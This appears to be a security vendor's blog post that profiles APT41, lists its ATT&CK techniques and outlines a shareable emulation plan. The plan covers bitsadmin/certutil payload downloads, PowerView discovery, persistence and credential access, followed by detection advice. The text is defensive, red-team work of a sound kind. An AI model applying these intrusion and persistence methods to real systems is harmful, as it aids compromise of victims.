Welcome to another week of #ThreatThursday. This week we leverage an adversary emulation plan created and shared to the community by a third party: APT41 Emulation Plan. As usual, we will cover Cyber Threat Intelligence, create a threat actor profile, create an adversary emulation plan from the work done by Huy, share the plan in our Github, explain some of the new TTPs we will leverage, and discuss how to defend against APT41. We hope you enjoy.
Cyber Threat Intelligence
APT41 is a Chinese actor first seen active in 2012 and has been observed in a broad ranging campaign through 2020. Its intent has been both for state-sponsored espionage as well as for financial reasons. After exploitation, APT leverages sophisticated TTPs and even deploys additional payloads with multiple different methods such as bitsadmin and certutil. It also looks to evade defenses and establish persistence, making it an incredibly dangerous piece of malware.
Cyber Threat Intelligence Sources:
Many of these TTPs have been discussed in previous #ThreatThursdays so we want to focus on some new ones. In the adversary emulation part section we will discuss:
- Execution Guardrails - restricting the payload to only execute within a particular domain environment
- Bitsadmin - to download a payload
- Certutil - to download a payload
- PowerView.ps1 - PowerShell script to gain situational awareness on a domain
Adversary Emulation Plan
After reviewing the Cyber Threat Intelligence reports and MITRE ATT&CK mapping, we organized the TTPs by Tactic and created a threat profile for APT41:
T1190 - Exploit Public-Facing Application
T1566 - Phishing
T1566.001 - Spearphishing Attachment
T1195 - Supply Chain Compromise
T1195.002 - Compromise Software Supply Chain
Command and Control
T1071 - Application Layer Protocol
T1071.004 - DNS
T1071.002 - File Transfer Protocols
T1071.001 - Web Protocols
T1568 - Dynamic Resolution
T1568.002 - Domain Generation Algorithms
T1008 - Fallback Channels
T1105 - Ingress Tool Transfer
T1104 - Multi-Stage Channels
T1090 - Proxy
T1102 - Web Service
T1102.001 - Dead Drop Resolver
T1560 - Archive Collected Data
T1560.001 - Archive via Utility
T1056 - Input Capture
T1056.001 - Keylogging
T1059 - Command and Scripting Interpreter
T1059.001 - PowerShell
T1059.003 - Windows Command Shell
T1059.004 - Unix Shell
T1203 - Exploitation for Client Execution
T1053 - Scheduled Task/Job
T1053.005 - Scheduled Task
T1569 - System Services
T1569.002 - Service Execution
T1047 - Windows Management Instrumentation
T1197 - BITS Jobs
T1480 - Execution Guardrails
T1480.001 - Environmental Keying
T1070 - Indicator Removal on Host
T1070.001 - Clear Windows Event Logs
T1070.003 - Clear Command History
T1070.004 - File Deletion
T1036 - Masquerading
T1036.005 - Match Legitimate Name or Location
T1112 - Modify Registry
T1027 - Obfuscated Files or Information
T1542 - Pre-OS Boot
T1055 - Process Injection
T1014 - Rootkit
T1218 - Signed Binary Proxy Execution
T1218.001 - Compiled HTML File
T1553 - Subvert Trust Controls
T1553.002 - Code Signing
T1078 - Valid Accounts
T1110 - Brute Force
T1110.002 - Password Cracking
T1003 - OS Credential Dumping
T1003.001 - LSASS Memory
T1547 - Boot or Logon Autostart Execution
T1547.001 - Registry Run Keys / Startup Folder
T1136 - Create Account
T1136.001 - Local Account
T1543 - Create or Modify System Process
T1543.003 - Windows Service
T1133 - External Remote Services
T1574 - Hijack Execution Flow
T1574.002 - DLL Side-Loading
T1542.003 - Bootkit
T1083 - File and Directory Discovery
T1046 - Network Service Scanning
T1135 - Network Share Discovery
T1016 - System Network Configuration Discovery
T1049 - System Network Connections Discovery
T1033 - System Owner/User Discovery
T1546 - Event Triggered Execution
T1546.008 - Accessibility Features
T1021 - Remote Services
T1021.001 - Remote Desktop Protocol
T1486 - Data Encrypted for Impact
T1496 - Resource Hijacking
As usual, we created and shared the APT41 adversary emulation plan on our Github in both ATT&CK Navigator JSON and SCYTHE Threat JSON. In this emulation plan, we broke down the threat into different steps: discovery, execution, defense evasion, persistence, credential access, and clean up. We also added threat automation language to check if the payload is running with high integrity (administrative privilege). If it is running with privilege, it takes additional steps than if it is not running with privilege.
APT41 leverages the well-known powershell script for host, network, and domain situational awareness (also known as reconnaissance or discovery) called PowerView.ps1 There are multiple ways to download and execute this script in memory but in this case, we are going to download the script to the disk and then call the script to run various commandlets it provides:
Defense Evasion with bitsadmin and certutil
APT41 uses two well known living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system and have some added functionality. In the adversary emulation plan, we use bitsadmin and certutil to download two well-known powershell scripts for Kerberoasting and Domain Enumeration.
To maintain our non-destructive philosophy of emulation, we showed the ability to download example payloads and execute PowerShell commands without necessarily running anything malicious. To show a proof of concept for persistence, we chose to add example registry keys, services, and tasks so that they would be easily distinguishable and removable.
All of the above steps for persistence may be done by a user with limited privileges. We have added a check to the adversary emulation plan to determine the integrity of the process, if it is a high integrity process, then it performs other persistence and credential access TTPs that require administrative privileges:
After all the automation for APT41 is run, there are cleanup steps to remove the proof of concept persistence methods created by earlier actions.
Defend against APT41
While APT41 has quite the span of discovery, persistence, and evasion techniques, it also has a few specific key areas that can inform a security team on how to defend against it.
Additional Payload Download
APT41 has a few methods of downloading additional payloads: powershell, certutil, and bitsadmin. These are known as living off the land binaries and scripts. These are binaries signed by Microsoft that come with the operating system. Preventing their execution is very difficult so it is best to enable detection and alerting controls when they are used to access external resources.
Public PowerShell Scripts
APT41 has been observed to use various publicly available PowerShell scripts by downloading them onto the endpoint and then executing them. In this adversary emulation plan we download the following to disk:
In this case, we did not modify the scripts, creating detection for the exact script known to be used by malicious actors may be an easy and effective way to detect this activity. There are many ways around it but this detection is a start.
An alarming method that APT41 does to establish persistence on a victim is that it will look to create a user. To defend against this would require a group policy to disallow users from creating another user. Another method of persistence that is even more specific to APT41 is that it looks to create a service called “StorSyncSvc”. Detecting this service creation immediately (if the malware had somehow elevated privileges) would help defend against it.
While APT41 is quite the sophisticated actor, we can still ingest the Cyber Threat Intelligence, map it to MITRE ATT&CK, and create an adversary emulation plan that covers much of the behavior of the threat. More importantly, this emulation can aid in developing methods of preventing and detecting this threat through its specific and unique behaviors. We hope you enjoyed this edition of #ThreatThursday.
This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email firstname.lastname@example.org, visit https://scythe.io, or follow on Twitter @scythe_io.